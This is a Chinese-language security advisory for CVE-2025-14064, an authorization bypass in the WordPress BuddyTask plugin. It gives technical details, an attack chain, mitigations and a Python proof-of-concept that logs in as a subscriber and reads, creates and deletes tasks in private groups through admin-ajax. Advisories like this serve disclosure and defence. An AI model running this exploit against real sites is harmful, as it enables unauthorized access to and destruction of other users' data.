CVE-2025-14064 WordPress BuddyTask插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-14064

漏洞类型

访问控制/权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress BuddyTask插件

漏洞概述

CVE-2025-14064是WordPress BuddyTask插件中的一个高危安全漏洞。该插件是BuddyPress社交网络插件的任务看板管理组件。在1.3.0及以下所有版本中，由于多个AJAX端点缺少权限检查（Missing Authorization），导致严重的访问控制缺陷。攻击者只需拥有WordPress订阅者（Subscriber）级别账户，即可在未加入目标BuddyPress群组的情况下，查看、创建、修改和删除该群组的任务看板内容。这包括私人（Private）和隐藏（Hidden）群组，这些群组本应对非成员完全不可见。该漏洞允许低权限攻击者横向移动，访问敏感团队协作信息，篡改任务数据，甚至可能获取其他用户隐私信息。由于无需用户交互即可利用，攻击复杂度较低，对使用该插件的WordPress站点构成实质性威胁。

技术细节

该漏洞的根本原因是BuddyTask插件的多个AJAX处理函数未正确验证用户权限。在WordPress/BuddyPress权限模型中，用户访问特定群组的任务看板前应验证：(1)用户是否已登录；(2)用户是否为相应群组成员；(3)对于私人/隐藏群组，用户是否有特殊权限。但问题代码直接处理请求参数中的群组ID，未进行群组成员资格检查。攻击者可以通过构造恶意AJAX请求（如wp_ajax_buddytask_xxx动作），指定目标群组ID为任意私人/隐藏群组，绕过访问控制限制。漏洞涉及多个端点：buddytask.php第458行（任务列表）、第666行（任务创建）、第763行（任务删除）等。攻击者利用WordPress内置的wp_ajax钩子机制，通过Subscriber角色账户即可触发这些未授权操作，实现对任意群组任务数据的CRUD操作。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress Subscriber级别账户（通过注册或已有账户）

STEP 2

步骤2

识别目标WordPress站点安装的BuddyTask插件版本（需<=1.3.0）

STEP 3

步骤3

枚举目标BuddyPress群组ID（特别是私人或隐藏群组）

STEP 4

步骤4

构造AJAX请求，指定目标群组ID，调用缺少权限检查的端点（如buddytask_get_tasks、buddytask_create_task等）

STEP 5

步骤5

发送恶意请求，绕过群组成员资格验证，成功访问、创建、修改或删除该群组的任务看板数据

STEP 6

步骤6

提取敏感任务信息或篡改团队协作数据，可能导致数据泄露或业务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14064 PoC - BuddyTask Plugin Authorization Bypass
# Target: WordPress site with BuddyTask plugin <= 1.3.0

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress.local'
wp_admin_ajax = f'{target_url}/wp-admin/admin-ajax.php'

# Authenticate as Subscriber (lowest privilege level)
session = requests.Session()
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1'
}

# Login to WordPress
session.post(f'{target_url}/wp-login.php', data=login_data)

# Exploit: Access private/hidden group task board without membership
# Step 1: List tasks from a private group (group_id=999)
exploit_data_list = {
    'action': 'buddytask_get_tasks',  # AJAX action name
    'group_id': '999',  # Target private/hidden group
    'nonce': 'attacker_can_obtain_from_source'  # Some endpoints may lack nonce
}

print('[+] Sending task list request to private group...')
response = session.post(wp_admin_ajax, data=exploit_data_list)
print(f'Status: {response.status_code}')
print(f'Response: {response.text[:500]}')

# Step 2: Create unauthorized task
exploit_data_create = {
    'action': 'buddytask_create_task',
    'group_id': '999',
    'task_title': 'Malicious Task',
    'task_content': 'Compromised via CVE-2025-14064'
}

print('\n[+] Creating unauthorized task...')
response = session.post(wp_admin_ajax, data=exploit_data_create)
print(f'Status: {response.status_code}')

# Step 3: Delete tasks/exfiltrate data
exploit_data_delete = {
    'action': 'buddytask_delete_task',
    'task_id': '1',  # Target task ID
    'group_id': '999'
}

print('\n[+] Deleting tasks from unauthorized group...')
response = session.post(wp_admin_ajax, data=exploit_data_delete)
print(f'Status: {response.status_code}')

print('\n[!] If above requests succeeded without 403/permission error, target is vulnerable.')

影响范围

BuddyTask插件 < 1.3.1（所有1.3.0及以下版本均受影响）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1)限制WordPress新用户注册功能，防止攻击者获取Subscriber账户；(2)临时禁用BuddyTask插件，直到完成安全更新；(3)通过Web应用防火墙（WAF）规则限制对wp-admin/admin-ajax.php的异常请求，监控来自单一账户的批量AJAX调用；(4)检查BuddyPress日志，排查是否存在未授权的任务看板访问行为；(5)考虑对私人/隐藏群组实施额外的IP白名单或双因素认证机制。